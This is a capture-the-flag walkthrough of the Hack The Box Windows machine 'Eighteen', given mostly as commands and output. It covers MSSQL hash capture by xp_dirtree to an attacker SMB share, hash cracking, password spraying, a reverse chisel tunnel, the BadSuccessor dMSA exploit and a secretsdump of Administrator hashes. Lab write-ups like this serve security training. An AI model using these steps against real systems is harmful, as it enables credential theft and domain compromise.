HTB: Windows — Eighteen

Machine Info

Eighteen is an easy Windows machine… As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!

Host / IP

10.10.11.95 / EIGHTEEN.HTB. We add the record to our /etc/hosts.

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─$ sudo nmap -sC -sV eighteen.htb -T4 -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-09 20:00 CET
Nmap scan report for eighteen.htb (10.10.11.95)
Host is up (0.066s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Welcome - eighteen.htb
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.95:1433: 
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-10T01:54:54
|_Not valid after:  2056-01-10T01:54:54
| ms-sql-info: 
|   10.10.11.95:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-01-10T02:01:15+00:00; +7h00m00s from scanner time.
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.28 seconds

We see a web port open, MSSQL and WinRM. Let’s visit the web page.

Website

1
2
3
4
5
6
7
8
9
└─$ ffuf -u http://eighteen.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r  
________________________________________________
admin                   [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 228ms]
dashboard               [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 102ms]
features                [Status: 200, Size: 2822, Words: 849, Lines: 88, Duration: 275ms]
login                   [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 92ms]
logout                  [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 111ms]
register                [Status: 200, Size: 2421, Words: 762, Lines: 76, Duration: 306ms]
:: Progress: [20481/20481] :: Job [1/1] :: 591 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

This website let us create and users and login. The credentials given cannot be used in the website. Let’s try the MSSQL.

MSSQL

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
└─$ impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@eighteen.htb       
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (kevin  guest@master)> select @@version;
                                                                                                                                                                                                                                            
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) 
        Oct  8 2022 05:58:25 
        Copyright (C) 2022 Microsoft Corporation
        Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
   

SQL (kevin  guest@master)> select name from sys.databases;
name                

master              

tempdb              

model               

msdb                

financial_planner   

SQL (kevin  guest@master)> select * from financial_planner.information_schema.tables;
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
SQL (kevin  guest@master)> 

We see that the credentials kevin:iNa2we6haRj2gaw! are used for a local SQL user. Although as we can see we have limited functionality and cannot use the financial_planner DB.

Let’s enumerate the database more.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
SELECT name, type_desc, is_disabled FROM sys.server_principals;
name                                  type_desc     is_disabled   
-----------------------------------   -----------   -----------   
sa                                    SQL_LOGIN               0   

public                                SERVER_ROLE             0   

sysadmin                              SERVER_ROLE             0   

securityadmin                         SERVER_ROLE             0   

serveradmin                           SERVER_ROLE             0   

setupadmin                            SERVER_ROLE             0   

processadmin                          SERVER_ROLE             0   

diskadmin                             SERVER_ROLE             0   

dbcreator                             SERVER_ROLE             0   

bulkadmin                             SERVER_ROLE             0   

##MS_ServerStateReader##              SERVER_ROLE             0   

##MS_ServerStateManager##             SERVER_ROLE             0   

##MS_DefinitionReader##               SERVER_ROLE             0   

##MS_DatabaseConnector##              SERVER_ROLE             0   

##MS_DatabaseManager##                SERVER_ROLE             0   

##MS_LoginManager##                   SERVER_ROLE             0   

##MS_SecurityDefinitionReader##       SERVER_ROLE             0   

##MS_PerformanceDefinitionReader##    SERVER_ROLE             0   

##MS_ServerSecurityStateReader##      SERVER_ROLE             0   

##MS_ServerPerformanceStateReader##   SERVER_ROLE             0   

kevin                                 SQL_LOGIN               0   

appdev                                SQL_LOGIN               0 

Here we try the to attack the MSSQL service by getting it’s NTLMv2 Hash by abusing the xp_dirtee. We setted up responder for this also and it works as we get the hash. Although we couldn’t crack it, which means that the password is not an easy one.

1
2
3
4
EXEC xp_dirtree '\\[ATTACKER-IP]\share';
subdirectory   depth   
   
SQL (kevin  guest@master)> 

Info

This is an easy and very useful attack in many scenarios when dealing with Windows services. responder is a multi-listener tool that listens for all sorts of different protocols at the samr time. Here we use MSSQL’s procedures to traverse a remote share (SMB) and thus getting the NTLMv2 hash for authentication from the service running MSSQL.

1
2
3
4
5
6
└─$ sudo responder -I tun0


[SMB] NTLMv2-SSP Client   : 10.10.11.95
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::EIGHTEEN:f2cc69a6c10e894f:0F7DA6C5BEDE57DFC07E6321829E33D6:010100000000000080B7E6792082DC018B6D5B0650087B130000000002000800570058004E00500001001E00570049004E002D0042004D004600310059004A00520049004F004400380004003400570049004E002D0042004D004600310059004A00520049004F00440038002E00570058004E0050002E004C004F00430041004C0003001400570058004E0050002E004C004F00430041004C0005001400570058004E0050002E004C004F00430041004C000700080080B7E6792082DC0106000400020000000800300030000000000000000000000000300000FACEC3742BA6DB4C61B8E76AA119CCF9CEB870D707039877B8BC1EE14F73B5620A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340034000000000000000000  

We should continue the enumeration of the database but it make sense to also check the web page more, its pages, endpoints, etc. We check the Login and Register page for SQL injection by trying to abuse it to throw errors. We do the same for the endpoints after we register a user. The app seems to be solid except the fact that it is throwing 500 server errors.

What we managed to find out is an error coming from the MSSQL when we try to register a user with the same username and thus we learned that an admin exists already!

We continue with our MSSQL enumeration now.

1
2
3
4
5
6
SQL (kevin  guest@master)> select distinct b.name from sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
name     
   
appdev   

SQL (kevin  guest@master)> 

With the above check we can check the impersonation rights the user has. We can impersonate the system user appdev. Below is tool we can use also for MSSQL enumeration and more. We give it a go for a double check.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
└─$ mssqlpwner kevin:'iNa2we6haRj2gaw!'@10.10.11.95 enumerate
[*] Connecting to 10.10.11.95:1433 as kevin
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[*] Discovered hostname: DC01
[*] Discovered server principal: appdev on DC01 (kevin@master/guest)
[*] Server information from DC01 (kevin@master/guest) is retrieved
[*] Server information from DC01 (kevin>I:appdev@master/guest) is retrieved
[*] Done!
[*] Enumeration completed successfully
[*] Saving state to file
[*] Linkable servers:
[*] Linked Server Name: DC01
[*] Chain: DC01 (kevin@master/guest)
[*] Hostname: DC01
[*] Chain ID: 8709b586-aa81-4f1b-a16a-cefe2170a88e
[*] Database User: guest
[*] Database Name: master
[*] Server User: kevin
[*] Instance Name: MSSQLSERVER
[*] Version: Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) 
        Oct  8 2022 05:58:25 
        Copyright (C) 2022 Microsoft Corporation
        Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
[*] Domain Name: EIGHTEEN
[*] Our user can impersonate these server principals: appdev
[*] These databases are trustworthy: msdb
[*] These databases are available: financial_planner
[*] --------------------------------------------------
[*] Linked Server Name: DC01
[*] Chain: DC01 (kevin>I:appdev@master/guest)
[*] Hostname: DC01
[*] Chain ID: fe6488c8-730c-4b68-bf94-53d6d565dd5f
[*] Database User: appdev
[*] Database Name: master
[*] Server User: appdev
[*] Instance Name: MSSQLSERVER
[*] Version: Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) 
        Oct  8 2022 05:58:25 
        Copyright (C) 2022 Microsoft Corporation
        Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
[*] Domain Name: EIGHTEEN
[*] Our user can impersonate these server principals: appdev
[*] These databases are trustworthy: msdb
[*] These databases are available: financial_planner
[*] --------------------------------------------------
[*] Nothing to revert

We impersonate appdev with the below statement and the continue into the financial_planner db.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
EXECUTE AS LOGIN = 'appdev'; 

select table_name from financial_planner.information_schema.tables;
table_name    
 
users         

incomes       

expenses      

allocations   

analytics     

visits        

SQL (appdev  appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.


SQL (appdev  appdev@financial_planner)> select * from users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at   
 
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03   

SQL (appdev  appdev@financial_planner)>

We manage to get the administrators hash from the database. Now we need to crack it in order to use elsewhere.

Important

Finding the correct hash attack mode is important for hashcat, as well as putting the above hash in the correct format. For that the official site helps us with examples. The hash needs to be converted from Hex to Base64 and changed a little bit to match the accepted format.

1
2
└─$ cat admin.hash
pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=

Now let’s use hashcat to crack it with the correct hashmode.

Admin's password

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ hashcat -m 10000 admin.hash /usr/share/wordlists/rockyou.txt.gz


pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10000 (Django (PBKDF2-SHA256))
Hash.Target......: pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZ...yIcTM=
Time.Started.....: Sat Jan 10 15:15:44 2026 (26 secs)
Time.Estimated...: Sat Jan 10 15:16:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:     1599 H/s (10.69ms) @ Accel:4 Loops:250 Thr:512 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 40960/14344385 (0.29%)
Rejected.........: 0/40960 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599750-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> loserface1
Hardware.Mon.#01.: Temp: 60c Util:100% Core:1860MHz Mem:6000MHz Bus:8

Started: Sat Jan 10 15:15:37 2026
Stopped: Sat Jan 10 15:16:11 2026

We have successfully cracked the hash and used it on the website.

The problem though is that we don’t get anything from it. Tried authenticating with WinRM on the DC host with various usernames(kevin or admin) didn’t work. Even trying username spraying attacks didn’t bring much.

Tip

What if there was a way to enumerate the local principals via the MSSQL credentils we have? Well, actually there is. We can enumerate the RIDs of a Windows host by us using MSSQL and find out what we are looking for. We will nxc for this.

Info

NetExec (often abbreviated as nxc) is a powerful, open-source network exploitation tool designed to automate security assessments of large networks, with a strong focus on Active Directory (AD) environments.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
└─$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
MSSQL       10.10.11.95     1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.10.11.95     1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 
MSSQL       10.10.11.95     1433   DC01             498: EIGHTEEN\Enterprise Read-only Domain Controllers                                                                                 
MSSQL       10.10.11.95     1433   DC01             500: EIGHTEEN\Administrator
MSSQL       10.10.11.95     1433   DC01             501: EIGHTEEN\Guest
MSSQL       10.10.11.95     1433   DC01             502: EIGHTEEN\krbtgt
MSSQL       10.10.11.95     1433   DC01             512: EIGHTEEN\Domain Admins
MSSQL       10.10.11.95     1433   DC01             513: EIGHTEEN\Domain Users
MSSQL       10.10.11.95     1433   DC01             514: EIGHTEEN\Domain Guests
MSSQL       10.10.11.95     1433   DC01             515: EIGHTEEN\Domain Computers
MSSQL       10.10.11.95     1433   DC01             516: EIGHTEEN\Domain Controllers
MSSQL       10.10.11.95     1433   DC01             517: EIGHTEEN\Cert Publishers
MSSQL       10.10.11.95     1433   DC01             518: EIGHTEEN\Schema Admins
MSSQL       10.10.11.95     1433   DC01             519: EIGHTEEN\Enterprise Admins
MSSQL       10.10.11.95     1433   DC01             520: EIGHTEEN\Group Policy Creator Owners
MSSQL       10.10.11.95     1433   DC01             521: EIGHTEEN\Read-only Domain Controllers                                                                                            
MSSQL       10.10.11.95     1433   DC01             522: EIGHTEEN\Cloneable Domain Controllers                                                                                            
MSSQL       10.10.11.95     1433   DC01             525: EIGHTEEN\Protected Users
MSSQL       10.10.11.95     1433   DC01             526: EIGHTEEN\Key Admins
MSSQL       10.10.11.95     1433   DC01             527: EIGHTEEN\Enterprise Key Admins
MSSQL       10.10.11.95     1433   DC01             528: EIGHTEEN\Forest Trust Accounts
MSSQL       10.10.11.95     1433   DC01             529: EIGHTEEN\External Trust Accounts
MSSQL       10.10.11.95     1433   DC01             553: EIGHTEEN\RAS and IAS Servers
MSSQL       10.10.11.95     1433   DC01             571: EIGHTEEN\Allowed RODC Password Replication Group                                                                                 
MSSQL       10.10.11.95     1433   DC01             572: EIGHTEEN\Denied RODC Password Replication Group                                                                                  
MSSQL       10.10.11.95     1433   DC01             1000: EIGHTEEN\DC01$
MSSQL       10.10.11.95     1433   DC01             1101: EIGHTEEN\DnsAdmins
MSSQL       10.10.11.95     1433   DC01             1102: EIGHTEEN\DnsUpdateProxy
MSSQL       10.10.11.95     1433   DC01             1601: EIGHTEEN\mssqlsvc
MSSQL       10.10.11.95     1433   DC01             1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01                                                                                       
MSSQL       10.10.11.95     1433   DC01             1603: EIGHTEEN\HR
MSSQL       10.10.11.95     1433   DC01             1604: EIGHTEEN\IT
MSSQL       10.10.11.95     1433   DC01             1605: EIGHTEEN\Finance
MSSQL       10.10.11.95     1433   DC01             1606: EIGHTEEN\jamie.dunn
MSSQL       10.10.11.95     1433   DC01             1607: EIGHTEEN\jane.smith
MSSQL       10.10.11.95     1433   DC01             1608: EIGHTEEN\alice.jones
MSSQL       10.10.11.95     1433   DC01             1609: EIGHTEEN\adam.scott
MSSQL       10.10.11.95     1433   DC01             1610: EIGHTEEN\bob.brown
MSSQL       10.10.11.95     1433   DC01             1611: EIGHTEEN\carol.white
MSSQL       10.10.11.95     1433   DC01             1612: EIGHTEEN\dave.green

Bingo, we got a ton if information. We save these usernames in a users.txt so we can do a spray attack and have them for reference. We will use Crackmapexec to perform our attack and find which of these can be used with the known password to authenticate on the Windows DC.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
└─$ crackmapexec winrm 10.10.11.95 -u users.txt  -p 'iloveyou1'


SMB         10.10.11.95     5985   NONE             [*] None (name:10.10.11.95) (domain:None)
HTTP        10.10.11.95     5985   NONE             [*] http://10.10.11.95:5985/wsman

WINRM       10.10.11.95     5985   NONE             [-] EIGHTEEN\jamie.dunn:iloveyou1
WINRM       10.10.11.95     5985   NONE             [-] EIGHTEEN\jane.smith:iloveyou1
WINRM       10.10.11.95     5985   NONE             [-] EIGHTEEN\alice.jones:iloveyou1
WINRM       10.10.11.95     5985   NONE             [+] EIGHTEEN\adam.scott:iloveyou1 (Pwn3d!)                        

So that’s how we get the user flag.

Evil-WinRM usage

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
└─$ evil-winrm -i 10.10.11.95 -u 'EIGHTEEN\adam.scott' -p 'iloveyou1'
                                        
Evil-WinRM shell v3.7

*Evil-WinRM* PS C:\Users\adam.scott\Documents> ls ..\Desktop

    Directory: C:\Users\adam.scott\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         1/11/2026   7:38 PM             34 user.txt

Root

One important thing to do that generally helps in enumeration and in our tools usage is to expose all the internal ports and networks. We can create a reverse dynamic tunnel and have all the interal services reachable from our attackr host. Even though in our example can be more or less helpful it’s still good to do it. On the Windows DC we don’t see SSH.exe so we can use Chisel for that.

Info

Chisel is an HTTP tunneling tool that encapsulates our data stream within HTTP. It also uses the SSH protocol within the tunnel so our data will be encrypted.

Attacker/Kali host.

1
2
3
4
5
└─$ chisel server --port 8081 --reverse
2026/01/12 13:47:52 server: Reverse tunnelling enabled
2026/01/12 13:47:52 server: Listening on http://0.0.0.0:8081
2026/01/12 13:50:09 server: session#1: Client version (1.11.3) differs from server version (1.11.3-0kali1)
2026/01/12 13:50:09 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

And from the victim host.

1
2
3
4
5
*Evil-WinRM* PS C:\Users\adam.scott> .\chisel.exe client ATTACKER-IP:8081 R:socks
chisel.exe : 2026/01/12 11:50:09 client: Connecting to ws://ATTACKER-IP:8081
    + CategoryInfo          : NotSpecified: (2026/01/12 11:5..:8081:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2026/01/12 11:50:09 client: Connected (Latency 39.7108ms)

Enumeration

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

*Evil-WinRM* PS C:\Users\adam.scott> net user /domain

User accounts for \\


adam.scott               Administrator            alice.jones
bob.brown                carol.white              dave.green
Guest                    jamie.dunn               jane.smith
krbtgt                   mssqlsvc
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\adam.scott> whoami /groups

GROUP INFORMATION


Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
EIGHTEEN\IT                                Group            S-1-5-21-1152179935-589108180-1989892463-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\adam.scott> whoami /priv

PRIVILEGES INFORMATION


Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We have done some basic checks on the user and its privileges. Our target seems to be the Administrator user but we can have a better idea how to get there by checking Bloodhound. First we collect enumerate the AD with Sharphound and then we import it our Bloodhound instance locally.

Info

We skip the part where we tranfer the Sharphound.ps1, import it and run it and then tranfer the .zip file back to our local attacker host. But any artifacts can be transfered from the attacker => victim by spinning a web server(python -m http.server 80) and using iwr from the Windows victim host. The opposite can be done also by running an SMB server on the attacker (impacket-smbserver) and just mounting that share from the Windows host.

Bloodhound revelead interesting stuff about our user. Part of group IT. We continued looking for all the important stuff and “must” checks but we didn’t get anything interesting. Even continued importing PowerView and enumerate a bit more the AD but nothing popped.

The we started looking online also based on our Windows version.

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\adam.scott\Documents> Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion

dnshostname       operatingsystem                operatingsystemversion
-----------       ---------------                ----------------------
DC01.eighteen.htb Windows Server 2025 Datacenter 10.0 (26100)

*Evil-WinRM* PS C:\Users\adam.scott\Documents> $cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'; "$($cv.CurrentBuild).$($cv.UBR)"
26100.4349

For that specific Windows build there were tons of CVEs and possible exploitable vulnerabilities. We focused again in AD enumeration to see if we had missed something and with Powerview we see check for interesting ACLs.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\adam.scott\Documents> Find-InterestingDomainAcl

...
ObjectDN                : OU=Staff,DC=eighteen,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName   : IT
IdentityReferenceDomain : eighteen.htb
IdentityReferenceDN     : CN=IT,OU=Staff,DC=eighteen,DC=htb
IdentityReferenceClass  : group

Looking up the CreateChild right in an OU we came accross the CVE-2025-53779 aka BadSuccessor.

BadSuccessor(CVE-2025-53779)

You can read more about it here. We tried using SharpSuccessor but didn’t work as expected. But BadSuccessor.ps1 did.

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "lol2_dmsa" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Successfully created and configured dMSA 'lol2_dmsa'
Object adam.scott can now impersonate Administrator

Tip

Make sure to update Impacket before as this is a fairly new attack.

We can now impersonate Administrator user!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
┌──(panas㉿kalig5)-[~/Desktop/htb-labs/eighteen/attack-bins]
└─$ proxychains impacket-getST  eighteen/adam.scott:iloveyou1 -dc-ip 10.10.11.95 -impersonate "lol_dmsa$" -self -dmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

We get the Clock Skew issue. This means we need our clock to match the Server’s (victim).

1
└─$ sudo timedatectl set-time "$(date -d "$(curl -s -I http://10.10.11.95 | grep -i '^Date:' | cut -d ' ' -f2-)" '+%Y-%m-%d %H:%M:%S')"

Let’s run our attack again to obtain the ticket for lol2_dmsa$.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─$ proxychains impacket-getST  eighteen.htb/adam.scott:iloveyou1  -impersonate "lol2_dmsa$" -dc-ip 10.10.11.95 -self -dmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[*] Impersonating lol2_dmsa$
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:4b0b61f3b184f5bc6d2da8954ddedcfab3151583491bd75c40b067ddc0e80383
[*] EncryptionTypes.aes128_cts_hmac_sha1_96:a6b006a464556aa13606aa4913aa1b3a
[*] EncryptionTypes.rc4_hmac:40aabb572d561f64d7ae4ba428551ca4
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in lol2_dmsa$@[email protected]

Info

The attack flow of that specific CVE is abusing dMSA. How? Our user has CreateChild permissions over the Staff OU, allowing the creation of a malicious dMSA object, which was abused to impersonate the Domain Administrator.

Having the ticket in our disposal we can just use it to query whatever we want. We need to export it so Impacket can find it export KRB5CCNAME='lol2_dmsa$@[email protected]'.

Administrator hash

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
proxychains impacket-secretsdump -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip 10.10.11.95
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01.eighteen.htb:49680  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.11.95:88  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
└─$ evil-winrm -i 10.10.11.95 -u 'EIGHTEEN\Administrator' -H 0b133be956bfaddf9cea56701affddec
                                        
Evil-WinRM shell v3.7
